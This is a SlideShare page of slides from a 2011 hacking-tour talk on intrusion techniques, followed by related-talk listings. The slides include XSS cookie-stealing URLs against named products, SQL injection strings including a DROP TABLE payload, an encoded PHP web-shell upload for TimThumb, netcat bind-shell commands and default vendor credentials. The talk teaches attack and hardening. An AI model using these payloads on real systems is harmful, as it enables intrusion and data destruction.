SlideShare a Scribd company logo
Intrusion Techniques
                            DcLabs Hacking Tour 2011




Ewerson Guimarães (Crash)                         DcLabs – HackingTour 2011
повестка дня
отпечатков пальцев
Веб-ошибок
Задняя дверь
грубая сила
шеллкод
Эксплойты
Сканеры



Ewerson Guimarães (Crash)        DcLabs – HackingTour 2011
FingerPrint
 Grab informations about a target host.
 Ex: It's used to identify Operational System and/or
 Services(daemon) version number by TCP/IP response's
 unique characteristics.

 The best tool for discovery operating systems, services,
 devices and others: NMAP (Network Mapper)

 Basic commands:

 nmap host (Basic)
 nmap –sV host (Service Versions)
 nmap –P0 host ( ICMP ECHO-REPLY Ignore)
 nmap –O host (Try to grab O.S version)
 nmap –f host (Firewall/IDS/IPS Evasion)


Ewerson Guimarães (Crash)                                   DcLabs – HackingTour 2011
Passive - FingerPrint

 • TTL - When the operating system sets the Time To Live
   on the outbound packet

 • Window Size - When the operating system sets the
   Window Size at.

 • DF - =The operating system set the Don't Fragment bit.

 • TOS - The operating system set the Type of Service,
   and if so, at what.




Ewerson Guimarães (Crash)                                   DcLabs – HackingTour 2011
FingerPrint
Matrix:




Ewerson Guimarães (Crash)                 DcLabs – HackingTour 2011
FingerPrint
U. Bourne




Ewerson Guimarães (Crash)                 DcLabs – HackingTour 2011
FingerPrint
In BackTrack Linux you can find many softwares to
Finger-Print




               Http://www.backtrack-linux.com


Ewerson Guimarães (Crash)                           DcLabs – HackingTour 2011
Web Vulnerability
These vulnerabilities are initially explored through
malicious browser requests compromising the target
in a matter of minutes



 Cross Site (XSS) – Reflected / Stored

 SQL-Injection

 PHP (LFI / RFI/ AFU / RCE)




Ewerson Guimarães (Crash)                         DcLabs – HackingTour 2011
Web Vulnerability
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications that enables
malicious attackers to inject client-side script into web pages
viewed by other users.

Spekx – Knowledge Base -
http://server/pls/ksp_acesso.login_script?p_time=%221%22%
3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

LMS Web Ensino – TOTVS
http://site/lms/sistema/webensino/index.php?
modo=resbusca_biblioteca&pChave=a%22%2F%3E+
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
&Submit=Buscar



Ewerson Guimarães (Crash)                                         DcLabs – HackingTour 2011
Web Vulnerability




                 Reflected / Stored Xss



                            DEMO




Ewerson Guimarães (Crash)                 DcLabs – HackingTour 2011
Web Vulnerability




Ewerson Guimarães (Crash)               DcLabs – HackingTour 2011
What is the impact?


Why?


Examples?

Ewerson Guimarães (Crash)   DcLabs – HackingTour 2011
Web Vulnerability
SQL-Injection

It occurs when the attacker can insert a series of SQL statements
within a 'query' by manipulating the data entry application.

SELECT campos FROM tabela WHERE campo = 'test@test.com';

Inject string: some' OR 'x'='x
SELECT fields FROM table WHERE field = ‘some' OR 'x'='x';

admin'--      " or 0=0 #          ' or 1=1--      hi' or 'a'='a
' or 0=0 --   or 0=0 #            " or 1=1--      hi') or ('a'='a
" or 0=0 --   ' or 'x'='x         or 1=1--        hi") or ("a"="a
or 0=0 --     " or "x"="x         ' or a=a--      ‘);Drop table x;--
' or 0=0 #    ') or ('x'='x       hi" or 1=1 --   ') or ('a'='a




Ewerson Guimarães (Crash)                                              DcLabs – HackingTour 2011
SQL-Injection




                 LIVE DEMO OCOMON
            Throwing fudge at the fan

Ewerson Guimarães (Crash)               DcLabs – HackingTour 2011
Web Vulnerability
CGI/PHP Command Injection

It occurs when the attacker insert a series of
commands exploiting vulnerable CGI/PHP scripts

OneorZero – AFU + LFI

http://server/oneorzero/index.php?controller=../[FILE].php

WordPress TimThumb (Theme) Plugin – RCE
 x47x49x46x38x39x61x01x00x01x00x80x00x00
 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00
 x00x2Cx00x00x00x00x01x00x01x00x00x02x02
 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65
 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D
 x64x27x5Dx29x3Bx20x3Fx3Ex00


Ewerson Guimarães (Crash)                                    DcLabs – HackingTour 2011
Default/Weak passwords
Default passwords are set by its manufacturers/developers
and were not changed after the installation/configuration.

As supplied by the system vendor and meant to be changed at
installation time (Nobody do this shit)

Ex: Sw 3Com:
User: security - Pass: security

FireBird:
User: sysdba - Pass: masterkey

Weak: Passwords that are easily guessed or in a keyboard
sequential
Ex: 123456 - Love - House´s phone - Birthday - Etc...

Ewerson Guimarães (Crash)                                    DcLabs – HackingTour 2011
Brute Force
It consists in using random combinations of
characters/numbers and symbols, wordlists and/or
string generators to crack a password

Ex:
John the Ripper
Hydra
SSH Brute Force




Ewerson Guimarães (Crash)                          DcLabs – HackingTour 2011
Brute Force
 DirBuster - DirBuster is a multi threaded java application designed
 to brute force directories and files names on web/application servers




Ewerson Guimarães (Crash)                                           DcLabs – HackingTour 2011
Exploits
Kinds of Exploits:

Local: Usually, the objective of a local exploit is to elevate
user's privileges on the machine as close as possible to
root (uid=0) or administrator. They are written to exploit
kernel bugs or suid binaries

Remote: It works over a network connection and
exploit the vulnerable target without any prior access to it.

www.securityfocus.com
www.secunia.com
www.exploit-db.com

0Days It works usually an unpublished exploit from a brand
new found vulnerability. You can buy! $$$$$

Ewerson Guimarães (Crash)                                        DcLabs – HackingTour 2011
Exploits


If Kernel was patched?
      Will we cry?
 Alexos=>




Ewerson Guimarães (Crash)              DcLabs – HackingTour 2011
Exploits

      No!!!! Fuck him!!!
     We have others ways to pwn the box

     GNU C library dynamic linker

     Suid´s

     Etc...




Ewerson Guimarães (Crash)                 DcLabs – HackingTour 2011
Backdoors/RootKits
Used to maintain access to the system

We can Netcat use for this purpose:
nc –vv –l –p 5555
nc –vv –l –p 5555 –e /bin/bash
nc <ip> <port>

RootKits

The main purpose of a rootkit is to hide the attacker's presence
replacing vital system binaries from target's system
Example:
Hide files (with match strings)
Run command when match strings
Hide processes
Hide open ports, and others.


Ewerson Guimarães (Crash)                                      DcLabs – HackingTour 2011
Scanners/Fuzzers
There are 2 types of scanners: Specific which are written for
a specific vulnerability (BSQLHacker, SQLMAP) and Generic
which are written for various kinds of vulnerabilities. Generic
scanners use known service banners/strings to locate the
potential target/vulnerabilities




 W3af
                                     Nessus

Ewerson Guimarães (Crash)                                    DcLabs – HackingTour 2011
Scanners/Fuzzers




Ewerson Guimarães (Crash)               DcLabs – HackingTour 2011
Scanners/Fuzzers




Ewerson Guimarães (Crash)               DcLabs – HackingTour 2011
Sniffers
Sniffer monitors and analyzes network traffic. Some of these
packets may contain critical information (such as logins,
passwords and cool infos )
WhireShark -




Ewerson Guimarães (Crash)                                   DcLabs – HackingTour 2011
MetaSploit




Ewerson Guimarães (Crash)         DcLabs – HackingTour 2011
MetaSploit


               Let´s Fuck Windows?




Ewerson Guimarães (Crash)            DcLabs – HackingTour 2011
Hardening your server

HnTool is an open source (GPLv2) hardening tool for Unix.
It scans your system for vulnerabilities or problems in
configuration files allowing you to get a quick overview of
the security status of your system.




Ewerson Guimarães (Crash)                                     DcLabs – HackingTour 2011
Questions?


Ewerson Guimarães (Crash)   DcLabs – HackingTour 2011
Ewerson Guimarães (Crash)   DcLabs – HackingTour 2011
Contact


 Crash - crash@dclabs.com.br

 Irc: irc.freenode.net #dclabs

 twitter: @crashbrz




Ewerson Guimarães (Crash)         DcLabs – HackingTour 2011

More Related Content

What's hot

Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
Peter Hlavaty
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Mauricio Velazco
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
Peter Hlavaty
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
Shakacon
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
Peter Hlavaty
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programming
kozossakai
 
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
DefconRussia
 
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat Security Conference
 
Typhoon Managed Execution Toolkit
Typhoon Managed Execution ToolkitTyphoon Managed Execution Toolkit
Typhoon Managed Execution Toolkit
Dimitry Snezhkov
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_en
Sunghun Kim
 
Fuzzing
FuzzingFuzzing
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
Manich Koomsusi
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco Romano
Codemotion
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion Techniques
Jason Lang
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Priyanka Aash
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
Peter Hlavaty
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
CODE BLUE
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bug
vwchu
 

What's hot (20)

Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programming
 
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
 
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
 
Typhoon Managed Execution Toolkit
Typhoon Managed Execution ToolkitTyphoon Managed Execution Toolkit
Typhoon Managed Execution Toolkit
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_en
 
Fuzzing
FuzzingFuzzing
Fuzzing
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco Romano
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion Techniques
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bug
 

Viewers also liked

"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
SegInfo
 
Oficina Integradora - Daryus Impacta
Oficina Integradora - Daryus ImpactaOficina Integradora - Daryus Impacta
Oficina Integradora - Daryus Impacta
Luiz Sales Rabelo
 
Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012
Luiz Sales Rabelo
 
"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda
SegInfo
 
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu ProveitoRede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Junior Abreu
 
Processo investigativo - Faculdader Impacta
Processo investigativo - Faculdader ImpactaProcesso investigativo - Faculdader Impacta
Processo investigativo - Faculdader Impacta
Luiz Sales Rabelo
 
Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013
SegInfo
 
Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012
Luiz Sales Rabelo
 
CNASI 2011
CNASI 2011CNASI 2011
CNASI 2011
Luiz Sales Rabelo
 

Viewers also liked (9)

"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
 
Oficina Integradora - Daryus Impacta
Oficina Integradora - Daryus ImpactaOficina Integradora - Daryus Impacta
Oficina Integradora - Daryus Impacta
 
Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012
 
"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda
 
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu ProveitoRede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
 
Processo investigativo - Faculdader Impacta
Processo investigativo - Faculdader ImpactaProcesso investigativo - Faculdader Impacta
Processo investigativo - Faculdader Impacta
 
Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013
 
Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012
 
CNASI 2011
CNASI 2011CNASI 2011
CNASI 2011
 

Similar to "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por

Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
Festival Software Livre
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
Gabriel Mathenge
 
Enterprise Linux Exploit Mapper (ELEM) Demo
Enterprise Linux Exploit Mapper (ELEM) DemoEnterprise Linux Exploit Mapper (ELEM) Demo
Enterprise Linux Exploit Mapper (ELEM) Demo
jasoncallaway
 
Reverse Engineering 101
Reverse Engineering 101Reverse Engineering 101
Reverse Engineering 101
ysurer
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Security Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and SystemsSecurity Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and Systems
Antiy Labs
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
Bikrant Gautam
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutions
Jan Seidl
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
Security Weekly
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
Dr. Ramchandra Mangrulkar
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
lior mazor
 
The bash vulnerability practical tips to secure your environment
The bash vulnerability  practical tips to secure your environmentThe bash vulnerability  practical tips to secure your environment
The bash vulnerability practical tips to secure your environment
AlienVault
 
AntiRE en Masse
AntiRE en MasseAntiRE en Masse
AntiRE en Masse
Kurt Baumgartner
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - Beginners
Himanshu Kumar Das
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
Yury Chemerkin
 

Similar to "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por (20)

Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Enterprise Linux Exploit Mapper (ELEM) Demo
Enterprise Linux Exploit Mapper (ELEM) DemoEnterprise Linux Exploit Mapper (ELEM) Demo
Enterprise Linux Exploit Mapper (ELEM) Demo
 
Reverse Engineering 101
Reverse Engineering 101Reverse Engineering 101
Reverse Engineering 101
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Security Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and SystemsSecurity Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and Systems
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutions
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
The bash vulnerability practical tips to secure your environment
The bash vulnerability  practical tips to secure your environmentThe bash vulnerability  practical tips to secure your environment
The bash vulnerability practical tips to secure your environment
 
AntiRE en Masse
AntiRE en MasseAntiRE en Masse
AntiRE en Masse
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - Beginners
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 

More from SegInfo

Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição
SegInfo
 
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELKAnalisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
SegInfo
 
Midiakit SegInfo 2015
Midiakit SegInfo 2015Midiakit SegInfo 2015
Midiakit SegInfo 2015
SegInfo
 
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSBConvite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
SegInfo
 
Midiakit seginfo v05
Midiakit seginfo v05Midiakit seginfo v05
Midiakit seginfo v05
SegInfo
 
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
SegInfo
 
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
SegInfo
 
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
SegInfo
 
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire..."Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
SegInfo
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
SegInfo
 
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão..."Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
SegInfo
 
A Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan BonaguraA Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan Bonagura
SegInfo
 
"War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira "War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira
SegInfo
 
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos SentinelasProteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
SegInfo
 
"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini
SegInfo
 
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
SegInfo
 
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
SegInfo
 

More from SegInfo (17)

Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição
 
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELKAnalisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
 
Midiakit SegInfo 2015
Midiakit SegInfo 2015Midiakit SegInfo 2015
